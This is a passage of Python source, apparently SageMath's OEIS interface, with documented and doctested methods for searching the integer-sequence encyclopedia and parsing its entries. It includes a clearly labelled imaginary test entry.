any cases, the OEIS website will never provide more than 100 results.
- ``first_result`` - (integer, default: 0) allow to skip the
``first_result`` first results in the search, to go further.
This is useful if you are looking for a sequence that may appear
after the 100 first found sequences.
OUTPUT:
- if ``query`` is an integer or an OEIS ID (e.g. 'A000045'), returns
the associated OEIS sequence.
- if ``query`` is a string, returns a tuple of OEIS sequences whose
description corresponds to the query. Those sequences can be used
without the need to fetch the database again.
- if ``query`` is a list of integers, returns a tuple of OEIS sequences
containing it as a subsequence. Those sequences can be used without
the need to fetch the database again.
EXAMPLES::
sage: oeis
The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
A particular sequence can be called by its A-number or number::
sage: oeis('A000040') # optional -- internet
A000040: The prime numbers.
sage: oeis(45) # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
The database can be searched by subsequence::
sage: search = oeis([1,2,3,5,8,13]) ; search # optional -- internet
0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
1: A290689: Number of transitive rooted trees with n nodes.
2: A027926: Triangular array T read by rows: T(n,0) = T(n,2n) = 1 for n >= 0; T(n,1) = 1 for n >= 1; T(n,k) = T(n-1,k-2) + T(n-1,k-1) for k = 2..2n-1, n >= 2.
sage: fibo = search[0] # optional -- internet
sage: fibo.name() # optional -- internet
'Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.'
sage: print(fibo.first_terms()) # optional -- internet
(0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610, 987, 1597,
2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025, 121393, 196418,
317811, 514229, 832040, 1346269, 2178309, 3524578, 5702887, 9227465,
14930352, 24157817, 39088169, 63245986, 102334155)
sage: fibo.cross_references()[0] # optional -- internet
'A039834'
sage: fibo == oeis(45) # optional -- internet
True
sage: sfibo = oeis('A039834')
sage: sfibo.first_terms() # optional -- internet
(1, 1, 0, 1, -1, 2, -3, 5, -8, 13, -21, 34, -55, 89, -144, 233,
-377, 610, -987, 1597, -2584, 4181, -6765, 10946, -17711, 28657,
-46368, 75025, -121393, 196418, -317811, 514229, -832040, 1346269,
-2178309, 3524578, -5702887, 9227465, -14930352, 24157817)
sage: tuple(abs(i) for i in sfibo.first_terms())[2:20] == fibo.first_terms()[:18] # optional -- internet
True
sage: fibo.formulas()[4] # optional -- internet
'F(n) = F(n-1) + F(n-2) = -(-1)^n F(-n).'
sage: fibo.comments()[1] # optional -- internet
"F(n+2) = number of binary sequences of length n that have no
consecutive 0's."
sage: fibo.links()[0] # optional -- internet
'https://oeis.org/A000045/b000045.txt'
The database can be searched by description::
sage: oeis('prime gap factorization', max_results=4) # optional --internet
0: A073491: Numbers having no prime gaps in their factorization.
1: A073485: Product of any number of consecutive primes; squarefree numbers with no gaps in their prime factorization.
2: A073490: Number of prime gaps in factorization of n.
3: A073492: Numbers having at least one prime gap in their factorization.
.. NOTE::
The following will fetch the OEIS database only once::
sage: oeis([1,2,3,5,8,13]) # optional -- internet
0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
1: A290689: Number of transitive rooted trees with n nodes.
2: A027926: Triangular array T read by rows: T(n,0) = T(n,2n) = 1 for n >= 0; T(n,1) = 1 for n >= 1; T(n,k) = T(n-1,k-2) + T(n-1,k-1) for k = 2..2n-1, n >= 2.
sage: oeis('A000045') # optional -- internet
A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
Indeed, due to some caching mechanism, the sequence is not re-created
when called from its ID.
"""
def __call__(self, query, max_results=3, first_result=0):
    r"""
    Search the OEIS database.

    INPUT:

    - ``query`` -- a string (either an A-number such as ``'A000045'``,
      or a free-text description), an integer (the number of the
      sequence), or a list/tuple of integers (a subsequence to look for).

    - ``max_results`` -- (integer, default: 3) maximum number of results
      for description and subsequence searches.

    - ``first_result`` -- (integer, default: 0) number of initial search
      results to skip.

    See the documentation of :class:`OEIS`.

    TESTS::

        sage: oeis()
        Traceback (most recent call last):
        ...
        TypeError: __call__() ...
    """
    if isinstance(query, str):
        # An exact A-number is fetched directly; any other string is
        # treated as a free-text description search.
        if re.match('^A[0-9]{6}$', query):
            return self.find_by_id(query)
        return self.find_by_description(query, max_results, first_result)
    elif isinstance(query, (int, Integer)):
        return self.find_by_id(query)
    elif isinstance(query, (list, tuple)):
        return self.find_by_subsequence(query, max_results, first_result)
    # Previously, an unsupported query type fell through and silently
    # returned None; fail loudly instead.
    raise TypeError("query must be a string, an integer, or a "
                    "list/tuple of integers, not %s" % type(query).__name__)
def __repr__(self):
    r"""
    Return the string representation of this database interface.

    TESTS::

        sage: oeis
        The On-Line Encyclopedia of Integer Sequences (https://oeis.org/)
    """
    return "The On-Line Encyclopedia of Integer Sequences ({})".format(oeis_url)
def find_by_id(self, ident, fetch=False):
    r"""
    Return the OEIS sequence with identifier ``ident``.

    INPUT:

    - ``ident`` -- a string (an A-number such as ``'A000040'``) or an
      integer (the number of the sequence).

    - ``fetch`` -- bool (default: ``False``); whether to download the
      sequence content right away instead of lazily.

    OUTPUT:

    - The OEIS sequence whose A-number or number corresponds to ``ident``.

    EXAMPLES::

        sage: oeis.find_by_id('A000040')    # optional -- internet
        A000040: The prime numbers.

        sage: oeis.find_by_id(40)           # optional -- internet
        A000040: The prime numbers.
    """
    result = OEISSequence(ident=ident)
    if fetch:
        result.online_update()
    return result
def find_by_entry(self, entry):
    r"""
    Build an OEIS sequence from a raw entry in the OEIS internal format.

    INPUT:

    - ``entry`` -- a string corresponding to an entry in the internal
      format of the OEIS (lines of the form ``'%X AXXXXXX ...'``).

    OUTPUT:

    - The corresponding OEIS sequence.

    EXAMPLES::

        sage: entry = '%I A262002\n%N A262002 L.g.f.: log( Sum_{n>=0} x^n/n! * Product_{k=1..n} (k^2 + 1) ).\n%K A262002 nonn'
        sage: s = oeis.find_by_entry(entry)
        sage: s
        A262002: L.g.f.: log( Sum_{n>=0} x^n/n! * Product_{k=1..n} (k^2 + 1) ).
    """
    # Characters 3..9 of the first line carry the A-number
    # (e.g. '%I A262002 ...').
    sequence = OEISSequence(ident=entry[3:10])
    # Store the raw text so no online fetch is needed later.
    sequence._raw = entry
    return sequence
def find_by_description(self, description, max_results=3, first_result=0):
    r"""
    Search the OEIS for sequences matching a textual description.

    INPUT:

    - ``description`` -- (string) the description of the searched sequences.

    - ``max_results`` -- (integer, default: 3) the maximum number of
      results wanted; the encyclopedia itself never returns more than 100.

    - ``first_result`` -- (integer, default: 0) number of initial results
      to skip, useful to page beyond the first matches.

    OUTPUT:

    - a tuple (with fancy formatting) of at most ``max_results`` OEIS
      sequences, usable without fetching the database again.

    EXAMPLES::

        sage: oeis.find_by_description('prime gap factorization') # optional -- internet
        0: A...: ...
        1: A...: ...
        2: A...: ...

        sage: prime_gaps = _[2] ; prime_gaps        # optional -- internet
        A073490: Number of prime gaps in factorization of n.
    """
    query_string = urlencode({'q': description,
                              'n': str(max_results),
                              'fmt': 'text',
                              'start': str(first_result)})
    raw = _fetch(oeis_url + "search?" + query_string)
    # The text reply starts with two header paragraphs and ends with a
    # trailing paragraph; the entries sit in between.
    entries = raw.split('\n\n')[2:-1]
    return FancyTuple([self.find_by_entry(entry=e) for e in entries])
def find_by_subsequence(self, subsequence, max_results=3, first_result=0):
    r"""
    Search the OEIS for sequences containing the given subsequence.

    INPUT:

    - ``subsequence`` -- a list of integers.

    - ``max_results`` -- (integer, default: 3) the maximum number of
      results requested.

    - ``first_result`` -- (integer, default: 0) number of initial results
      to skip, useful to page beyond the first matches.

    OUTPUT:

    - a tuple (with fancy formatting) of at most ``max_results`` OEIS
      sequences, usable without fetching the database again.

    EXAMPLES::

        sage: oeis.find_by_subsequence([2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377]) # optional -- internet
        0: A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        1: A212804: Expansion of (1-x)/(1-x-x^2).
        2: A177194: Fibonacci numbers whose decimal expansion does not contain any digit 0.
    """
    # str([2, 3, 5])[1:-1] yields '2, 3, 5', the comma-separated search
    # string expected by the OEIS search engine.
    terms = str(subsequence)[1:-1]
    return self.find_by_description(terms, max_results, first_result)
def browse(self):
    r"""
    Open the main OEIS web page in a browser.

    EXAMPLES::

        sage: oeis.browse()                 # optional -- webbrowser
    """
    import webbrowser as browser
    browser.open(oeis_url)
def _imaginary_entry(self, ident='A999999', keywords=''):
    r"""
    This is an imaginary entry of an OEIS sequence for offline tests.

    The returned string exercises every field letter the parser knows
    about (``%I``, ``%S/%T/%U``, ``%N``, ``%D``, ``%H``, ``%F``, ``%Y``,
    ``%A``, ``%O``, ``%E``, ``%e``, ``%p``, ``%t``, ``%o``, ``%K``,
    ``%C``), so offline doctests can cover the accessor methods.

    INPUT:

    - ``ident`` -- a string representing the A-number of the sequence.

    - ``keywords`` -- a string corresponding to the keyword field of the
      sequence.

    OUTPUT:

    - a string representing the entry of the sequence.

    TESTS::

        sage: oeis._imaginary_entry().split('\n')[0]
        '%I A999999 M9999 N9999'

        sage: keywords = 'simon,cussonet'
        sage: s = oeis.find_by_entry(entry=oeis._imaginary_entry(ident='A999998', keywords=keywords))
        sage: ','.join(s.keywords()) == keywords
        True
    """
    # Each line mimics the OEIS internal format: a two-character field
    # tag, a space, the A-number, a space, then the field content.
    return ('%I ' + ident + ' M9999 N9999\n'
            '%S ' + ident + ' 1,1,1,1,2,1,1,1,\n'
            '%T ' + ident + ' 1,1,1,1,1,1,1,1,1,\n'
            '%U ' + ident + ' 1,1,1,1,1,1,1,1,1\n'
            '%N ' + ident + ' The characteristic sequence of 42 plus one, starting from 38.\n'
            '%D ' + ident + ' Lewis Carroll, Alice\'s Adventures in Wonderland.\n'
            '%D ' + ident + ' Lewis Carroll, The Hunting of the Snark.\n'
            '%D ' + ident + ' Deep Thought, The Answer to the Ultimate Question of Life, The Universe, and Everything.\n'
            '%H ' + ident + ' Wikipedia, <a href="https://en.wikipedia.org/wiki/42_(number)">42 (number)</a>\n'
            '%H ' + ident + ' See. also <a href="https://trac.sagemath.org/sage_trac/ticket/42">trac ticket #42</a>\n'
            '%H ' + ident + ' Do not confuse with the sequence <a href="/A000042">A000042</a> or the sequence <a href="/A000024">A000024</a>\n'
            '%H ' + ident + ' The string http://42.com is not a link.\n'
            '%F ' + ident + ' For n big enough, s(n+1) - s(n) = 0.\n'
            '%Y ' + ident + ' Related sequences are A000042 and its friend A000024.\n'
            '%A ' + ident + ' Anonymous.\n'
            '%O ' + ident + ' 38,4\n'
            '%E ' + ident + ' This sequence does not contain errors.\n'
            '%e ' + ident + ' s(42) + s(43) = 0.\n'
            '%p ' + ident + ' Do not even try, Maple is not able to produce such a sequence.\n'
            '%t ' + ident + ' Mathematica neither.\n'
            '%o ' + ident + ' (Python)\n'
            '%o ' + ident + ' def ' + ident + '(n):\n'
            '%o ' + ident + '     assert(isinstance(n, (int, Integer))), "n must be an integer."\n'
            '%o ' + ident + '     if n < 38:\n'
            '%o ' + ident + '         raise ValueError("The value %s is not accepted." %str(n))\n'
            '%o ' + ident + '     elif n == 42:\n'
            '%o ' + ident + '         return 2\n'
            '%o ' + ident + '     else:\n'
            '%o ' + ident + '         return 1\n'
            '%K ' + ident + ' ' + keywords + '\n'
            '%C ' + ident + ' 42 is the product of the first 4 prime numbers, except 5 and perhaps 1.\n'
            '%C ' + ident + ' Apart from that, i have no comment.')
def _imaginary_sequence(self, ident='A999999', keywords='sign,easy'):
    r"""
    Return the OEIS sequence built from the imaginary entry.

    Its main purpose is to allow offline doctesting.

    INPUT:

    - ``ident`` -- a string representing the A-number of the sequence.

    - ``keywords`` -- string (default: 'sign,easy'), a list of words
      separated by commas.

    OUTPUT:

    - OEIS sequence.

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s
        A999999: The characteristic sequence of 42 plus one, starting from 38.
        sage: s[4]
        2
        sage: s(42)
        2
    """
    entry = self._imaginary_entry(ident=ident, keywords=keywords)
    return self.find_by_entry(entry=entry)
class OEISSequence(SageObject, UniqueRepresentation):
r"""
The class of OEIS sequences.
This class implements OEIS sequences. They are usually produced by calls to
the On-Line Encyclopedia of Integer Sequences, represented by the class
:class:`OEIS`.
.. NOTE::
Since some sequences do not start with index 0, there is a difference
between calling and getting item, see :meth:`__call__` for more details
::
sage: sfibo = oeis('A039834')
sage: sfibo.first_terms()[:10] # optional -- internet
(1, 1, 0, 1, -1, 2, -3, 5, -8, 13)
sage: sfibo(-2) # optional -- internet
1
sage: sfibo(3) # optional -- internet
2
sage: sfibo.offsets() # optional -- internet
(-2, 6)
sage: sfibo[0] # optional -- internet
1
sage: sfibo[6] # optional -- internet
-3
.. automethod:: __call__
"""
@staticmethod
def __classcall__(cls, ident):
    r"""
    Canonicalize the ID of the sequence into an A-number.

    Integers and short strings are left-padded with ``'A'`` and zeros up
    to the canonical 7-character form, so equal sequences share one key.

    TESTS::

        sage: oeis(45) is oeis('A000045')
        True
    """
    if not isinstance(ident, str):
        ident = str(ident)
    # 'A000000'[:-len(ident)] supplies exactly the missing prefix;
    # for a full 7-character A-number it is the empty string.
    padded = 'A000000'[:-len(ident)] + ident
    return super(OEISSequence, cls).__classcall__(cls, padded)
def __init__(self, ident):
    r"""
    Initialize an OEIS sequence.

    There is no fetching of additional information about the sequence at
    this point, only the A-number is required to construct a sequence.

    INPUT:

    - ``ident`` -- a string representing the A-number of the sequence or an
      integer representing its number.

    TESTS::

        sage: sfibo = oeis('A039834')
        sage: s = oeis._imaginary_sequence()
    """
    # Only the canonical A-number is stored; the entry text is fetched
    # lazily (see raw_entry / online_update).
    self._id = ident
def online_update(self):
    r"""
    Fetch the online OEIS to update the informations about this sequence.

    TESTS::

        sage: s = oeis._imaginary_sequence(ident='A004238')
        sage: s
        A004238: The characteristic sequence of 42 plus one, starting from 38.
        sage: s.online_update()             # optional -- internet
        sage: s                             # optional -- internet
        A004238: a(n) = 100*log(n) rounded to nearest integer.
    """
    query_string = urlencode({'q': self._id, 'n': '1', 'fmt': 'text'})
    reply = _fetch(oeis_url + "search?" + query_string)
    # The entry of interest is the third paragraph of the text reply.
    self._raw = reply.split('\n\n')[2]
    # Drop the cached parsed fields so they are rebuilt from the new raw
    # entry on the next access.
    self.__dict__.pop('_fields', None)
def _field(self, key):
    r"""
    Return the ``key`` field of the entry of ``self``.

    This method allows to handle the ``_fields`` dictionary in a lazy way:
    the raw entry is parsed only on first access, and the result cached in
    ``self._fields`` (a ``defaultdict(list)`` mapping the field letter to
    the list of its content lines).

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s._field('C')[0]
        '42 is the product of the first 4 prime numbers, except 5 and perhaps 1.'
    """
    try:
        return self._fields[key]
    except AttributeError:
        # First access: parse the raw entry once.
        fields = defaultdict(list)
        for line in self.raw_entry().splitlines():
            # line[1] is the field letter of the '%X AXXXXXX ...' tag;
            # line[11:] skips the 11-character '%X AXXXXXX ' prefix.
            fields[line[1]].append(line[11:])
        self._fields = fields
        # Warn about dead sequences only after caching, since is_dead()
        # itself reads the keywords through this method.
        self.is_dead(warn_only=True)
        return self._fields[key]
def id(self, format='A'):
    r"""
    The ID of the sequence ``self`` is the A-number that identifies
    ``self``.

    INPUT:

    - ``format`` -- (string, default: 'A').

    OUTPUT:

    - if ``format`` is set to 'A', returns a string of the form 'A000123'.
    - if ``format`` is set to 'int' returns an integer of the form 123.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.

        sage: f.id()                        # optional -- internet
        'A000045'

        sage: f.id(format='int')            # optional -- internet
        45

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.id()
        'A999999'
        sage: s.id(format='int')
        999999
    """
    if format == 'A':
        return self._id
    elif format == 'int':
        # Strip the 'A' prefix and the zero padding.
        return int(self._id[1:].lstrip("0"))
    # Previously an unrecognized format silently returned None.
    raise ValueError("format must be 'A' or 'int', got %r" % (format,))
def __hash__(self):
    r"""
    Return the hash of ``self``, which is its numerical OEIS ID.

    This method allows unique representation of OEIS sequences.

    OUTPUT:

    - Python `int`.

    EXAMPLES::

        sage: s = oeis([1,2,3,5,8,13])[0]   # optional -- internet
        sage: hash(s)                       # optional -- internet
        45

    We have unique representation::

        sage: t = oeis(45)                  # optional -- internet
        sage: s is t                        # optional -- internet
        True
        sage: s == t                        # optional -- internet
        True

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s is oeis._imaginary_sequence()
        True
        sage: s == oeis._imaginary_sequence()
        True
    """
    # The numeric part of the A-number is unique, hence a valid hash.
    return self.id(format='int')
def raw_entry(self):
    r"""
    Return the raw entry of the sequence ``self``, in the OEIS format.

    The raw entry is fetched online if it is not already cached.

    OUTPUT:

    - string.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: print(f.raw_entry())          # optional -- internet
        %I A000045 M0692 N0256
        %S A000045 0,1,1,2,3,5,8,13,21,34,55,89,144,...
        %T A000045 10946,17711,28657,46368,...
        ...

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.raw_entry() == oeis._imaginary_entry(keywords='sign,easy')
        True
    """
    # Fetch lazily: _raw is only present after an online_update() or
    # when the sequence was built from a raw entry.
    if not hasattr(self, '_raw'):
        self.online_update()
    return self._raw
def name(self):
    r"""
    Return the name of the sequence ``self``.

    OUTPUT:

    - string.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.name()                      # optional -- internet
        'Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.'

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.name()
        'The characteristic sequence of 42 plus one, starting from 38.'
    """
    # The name lives on the (single) %N line.
    name_lines = self._field('N')
    return name_lines[0]
def old_IDs(self):
    r"""
    Return the IDs of the sequence ``self`` corresponding to ancestors of OEIS.

    OUTPUT:

    - a tuple of at most two strings. When the string starts with `M`, it
      corresponds to the ID of "The Encyclopedia of Integer Sequences" of
      1995. When the string starts with `N`, it corresponds to the ID of
      the "Handbook of Integer Sequences" of 1973.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.old_IDs()                   # optional -- internet
        ('M0692', 'N0256')

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.old_IDs()
        ('M9999', 'N9999')
    """
    # The historical IDs are space-separated on the %I line.
    id_line = self._field('I')[0]
    return tuple(id_line.split(' '))
def offsets(self):
    r"""
    Return the offsets of the sequence ``self``.

    The first offset is the subscript of the first term in the sequence
    ``self``. When the sequence represents the decimal expansion of a real
    number, it corresponds to the number of digits of its integer part.

    The second offset is the first term in the sequence ``self`` (starting
    from 1) whose absolute value is greater than 1. This is set to 1 if all
    the terms are 0 or +-1.

    OUTPUT:

    - tuple of two elements.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.offsets()                   # optional -- internet
        (0, 4)

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.offsets()
        (38, 4)
    """
    # The %O line carries both offsets as a comma-separated pair.
    offset_line = self._field('O')[0]
    return to_tuple(offset_line)
def author(self):
    r"""
    Return the author of the sequence in the encyclopedia.

    OUTPUT:

    - string.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.author()                    # optional -- internet
        '_N. J. A. Sloane_, 1964'

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.author()
        'Anonymous.'
    """
    # The author lives on the (single) %A line.
    author_lines = self._field('A')
    return author_lines[0]
def keywords(self):
    r"""
    Return the keywords associated to the sequence ``self``.

    OUTPUT:

    - tuple of strings.

    EXAMPLES::

        sage: f = oeis(53) ; f              # optional -- internet
        A000053: Local stops on New York City Broadway line (IRT #1) subway.
        sage: f.keywords()                  # optional -- internet
        ('nonn', 'fini', 'full')

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.keywords()
        ('sign', 'easy')

        sage: s = oeis._imaginary_sequence(ident='A999997', keywords='nonn,hard')
        sage: s.keywords()
        ('nonn', 'hard')
    """
    # Keywords are comma-separated on the %K line.
    keyword_line = self._field('K')[0]
    return tuple(keyword_line.split(','))
def natural_object(self):
    r"""
    Return the natural object associated to the sequence ``self``.

    OUTPUT:

    - If the sequence ``self`` corresponds to the digits of a real
      number, returns the associated real number (as an element of
      RealLazyField()).

    - If the sequence ``self`` corresponds to the convergents of a
      continued fraction, returns the associated continued fraction.

    .. WARNING::

        This method forgets the fact that the returned sequence may not be
        complete.

    .. TODO::

        - ask OEIS to add a keyword telling whether the sequence comes from
          a power series, e.g. for https://oeis.org/A000182
        - discover other possible conversions.

    EXAMPLES::

        sage: g = oeis("A002852") ; g       # optional -- internet
        A002852: Continued fraction for Euler's constant (or Euler-Mascheroni constant) gamma.
        sage: x = g.natural_object() ; type(x)  # optional -- internet
        <class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>

    ::

        sage: ee = oeis('A001113') ; ee     # optional -- internet
        A001113: Decimal expansion of e.
        sage: x = ee.natural_object() ; x   # optional -- internet
        2.718281828459046?

    TESTS::

        sage: s = oeis._imaginary_sequence(ident='A999996', keywords='nonn,cofr')
        sage: type(s.natural_object())
        <class 'sage.rings.continued_fraction.ContinuedFraction_periodic'>

        sage: s = oeis._imaginary_sequence(ident='A999995', keywords='nonn')
        sage: s.natural_object().universe()
        Non negative integer semiring

        sage: s = oeis._imaginary_sequence()
        sage: s.natural_object().universe()
        Integer Ring
    """
    # Dispatch on the OEIS keywords; note the keyword checks are ordered,
    # so e.g. a 'cofr' sequence is never interpreted as 'cons'.
    if 'cofr' in self.keywords() and 'frac' not in self.keywords():
        # Continued-fraction expansion: terms are the partial quotients.
        from sage.rings.continued_fraction import continued_fraction
        return continued_fraction(self.first_terms())
    elif 'cons' in self.keywords():
        # Decimal expansion of a constant: the first offset is the number
        # of digits of the integer part, so the first `offset` terms go
        # before the decimal point and the rest after it.
        # NOTE(review): the zero padding with abs(offset) presumably
        # handles constants smaller than 1 (negative offset) — confirm.
        offset = self.offsets()[0]
        terms = self.first_terms() + tuple([0] * abs(offset))
        from sage.rings.real_lazy import RealLazyField
        return RealLazyField()('0' + ''.join(map(str, terms[:offset])) + '.' + ''.join(map(str, terms[offset:])))
    elif 'nonn' in self.keywords():
        # Non-negative sequence: view it over the semiring NN.
        from sage.structure.sequence import Sequence
        from sage.rings.semirings.non_negative_integer_semiring import NN
        return Sequence(self.first_terms(), NN)
    else:
        # Default: a plain integer sequence over ZZ.
        from sage.structure.sequence import Sequence
        from sage.rings.integer_ring import ZZ
        return Sequence(self.first_terms(), ZZ)
def is_dead(self, warn_only=False):
    r"""
    Tell whether the sequence is dead (i.e. erroneous).

    INPUT:

    - warn_only -- (bool, default: ``False``), whether to warn when the
      sequence is dead instead of returning a boolean.

    EXAMPLES:

    A warn_only test is triggered as soon as some information on the
    sequence is queried::

        sage: s = oeis(17)
        sage: s                             # optional -- internet
        doctest:warning
        ...
        RuntimeWarning: This sequence is dead: "A000017: Erroneous version of A032522."
        A000017: Erroneous version of A032522.

    TESTS::

        sage: s.is_dead()                   # optional -- internet
        True

        sage: t = oeis._imaginary_sequence()
        sage: t.is_dead()
        False
    """
    dead = 'dead' in self.keywords()
    if not warn_only:
        return dead
    # Warn-only mode: emit a warning for dead sequences, return nothing.
    if dead:
        from warnings import warn
        warn('This sequence is dead: "{}: {}"'.format(self.id(), self.name()), RuntimeWarning)
def is_finite(self):
    r"""
    Tell whether the sequence is finite.

    Currently, OEIS only provides a keyword when the sequence is known to
    be finite. So, when this keyword is not there, we do not know whether
    it is infinite or not.

    OUTPUT:

    - ``True`` when the sequence is known to be finite.
    - ``Unknown`` otherwise.

    .. TODO::

        Ask OEIS for a keyword ensuring that a sequence is infinite.

    EXAMPLES::

        sage: s = oeis('A114288') ; s       # optional -- internet
        A114288: Lexicographically earliest solution of any 9 X 9 sudoku, read by rows.
        sage: s.is_finite()                 # optional -- internet
        True

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.is_finite()
        Unknown

        sage: s = oeis._imaginary_sequence(ident='A999993', keywords='nonn,finit')
        sage: s.is_finite()
        True
    """
    kw = self.keywords()
    # 'full' implies finiteness: all terms are listed.
    if 'finit' in kw or 'full' in kw:
        return True
    return Unknown
def is_full(self):
    r"""
    Tell whether the sequence ``self`` is full, that is, if all its
    elements are listed in ``self.first_terms()``.

    Currently, OEIS only provides a keyword when the sequence is known to
    be full. So, when this keyword is not there, we do not know whether
    some elements are missing or not.

    OUTPUT:

    - ``True`` when the sequence is known to be full.
    - ``Unknown`` otherwise.

    EXAMPLES::

        sage: s = oeis('A114288') ; s       # optional -- internet
        A114288: Lexicographically earliest solution of any 9 X 9 sudoku, read by rows.
        sage: s.is_full()                   # optional -- internet
        True

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.is_full()
        Unknown

        sage: s = oeis._imaginary_sequence(ident='A999992', keywords='nonn,full,finit')
        sage: s.is_full()
        True
    """
    if 'full' not in self.keywords():
        return Unknown
    return True
@cached_method
def first_terms(self, number=None):
    r"""
    Return the known initial terms of the sequence.

    INPUT:

    - ``number`` -- (integer or ``None``, default: ``None``) the number of
      terms returned (if less than the number of available terms). When set
      to None, returns all the known terms.

    OUTPUT:

    - tuple of integers.

    EXAMPLES::

        sage: f = oeis(45) ; f              # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.
        sage: f.first_terms()[:10]          # optional -- internet
        (0, 1, 1, 2, 3, 5, 8, 13, 21, 34)

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s.first_terms()
        (1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
        sage: s.first_terms(5)
        (1, 1, 1, 1, 2)
    """
    # The initial terms are spread over the %S, %T and %U fields.
    raw_terms = " ".join(flatten([self._field(letter) for letter in ['S', 'T', 'U']]))
    return to_tuple(raw_terms)[:number]
def _repr_(self):
    r"""
    Print the sequence number and a short summary of this sequence.

    OUTPUT:

    - string.

    EXAMPLES::

        sage: f = oeis(45)                  # optional -- internet
        sage: f                             # optional -- internet
        A000045: Fibonacci numbers: F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1.

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s
        A999999: The characteristic sequence of 42 plus one, starting from 38.
    """
    return "{}: {}".format(self.id(), self.name())
def __call__(self, k):
    r"""
    Return the element of the sequence ``self`` with index ``k``.

    INPUT:

    - ``k`` -- integer.

    OUTPUT:

    - integer.

    .. NOTE::

        The first index of the sequence ``self`` is not necessarily zero,
        it depends on the first offset of ``self``. If the sequence
        represents the decimal expansion of a real number, the index 0
        corresponds to the digit right after the decimal point.

    EXAMPLES::

        sage: f = oeis(45)                  # optional -- internet
        sage: f(4)                          # optional -- internet
        3

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s(38)
        1
        sage: s(42)
        2
        sage: s(2)
        Traceback (most recent call last):
        ...
        ValueError: Sequence A999999 is not defined (or known) for index 2
    """
    first_offset = self.offsets()[0]
    # For decimal expansions ('cons'), index 0 is the first digit after
    # the decimal point, so the offset is applied in the other direction.
    if 'cons' in self.keywords():
        first_offset = -first_offset
    terms = self.first_terms()
    position = k - first_offset
    if position < 0 or position >= len(terms):
        raise ValueError("Sequence %s is not defined (or known) for index %s" % (self.id(), k))
    return terms[position]
def __getitem__(self, i):
    r"""
    Return the ``i``-th element of sequence ``self``, viewed as a tuple.

    The first element appearing in the sequence ``self`` corresponds to
    ``self[0]``, regardless of the offset. Do not confuse with calling
    ``self(k)``.

    INPUT:

    - ``i`` -- integer.

    OUTPUT:

    - integer.

    EXAMPLES::

        sage: sfibo = oeis('A039834')       # optional -- internet
        sage: sfibo[8]                      # optional -- internet
        -8
        sage: sfibo(8)                      # optional -- internet
        -21

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: s[2]
        1
        sage: s[4]
        2
        sage: s[38]
        Traceback (most recent call last):
        ...
        IndexError: tuple index out of range
    """
    known_terms = self.first_terms()
    return known_terms[i]
def __iter__(self):
    r"""
    Iterate over the first terms of ``self``, and raise an error if
    those first terms are exhausted and the real associated sequence
    still have terms to produce.

    OUTPUT:

    - integer.

    EXAMPLES::

        sage: w = oeis(7540) ; w            # optional -- internet
        A007540: Wilson primes: primes p such that (p-1)! == -1 (mod p^2).
        sage: i = w.__iter__()              # optional -- internet
        sage: next(i)                       # optional -- internet
        5
        sage: next(i)                       # optional -- internet
        13
        sage: next(i)                       # optional -- internet
        563
        sage: next(i)                       # optional -- internet
        Traceback (most recent call last):
        ...
        LookupError: Future values not provided by OEIS.

    TESTS::

        sage: s = oeis._imaginary_sequence()
        sage: for i in s:
        ....:     pass
        Traceback (most recent call last):
        ...
        LookupError: Future values not provided by OEIS.

        sage: s = oeis._imaginary_sequence(ident='A999991', keywords='sign,full')
